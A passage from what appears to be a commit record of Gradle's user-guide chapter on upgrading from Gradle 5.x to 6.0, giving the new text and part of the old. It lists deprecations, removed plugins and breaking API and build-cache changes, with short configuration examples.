internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n=== Potential breaking changes\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:repository-content-filtering,repository content filter>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Task validation changes\n\n- `ValidateTaskProperties.setClasses()` is now removed. Use `getClasses().setFrom()` instead.\n- `ValidateTaskProperties.setClasspath()` is now removed. use `getClasspath().setFrom()` instead.\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\nMiscellaneous::\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== BuildSrc usage in Gradle settings\n\nAccess to the buildSrc project and its dependencies in gradle settings scripts is now deprecated.\nThis is due to plans to make initialization of gradle builds more efficient.\n\nThis will become an error in Gradle 6.0.\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n\n===== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n\n\/\/\/\/\n== Changes in detail\n\n[[rel5.X:title]]\n=== [5.X] Title\n\nDetails...\n\/\/\/\/\n","old_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n=== Potential breaking changes\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nUse `getLocal()` and `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:repository-content-filtering,repository content filter>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Task validation changes\n\n- `ValidateTaskProperties.setClasses()` is now removed. Use `getClasses().setFrom()` instead.\n- `ValidateTaskProperties.setClasspath()` is now removed. use `getClasspath().setFrom()` instead.\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- 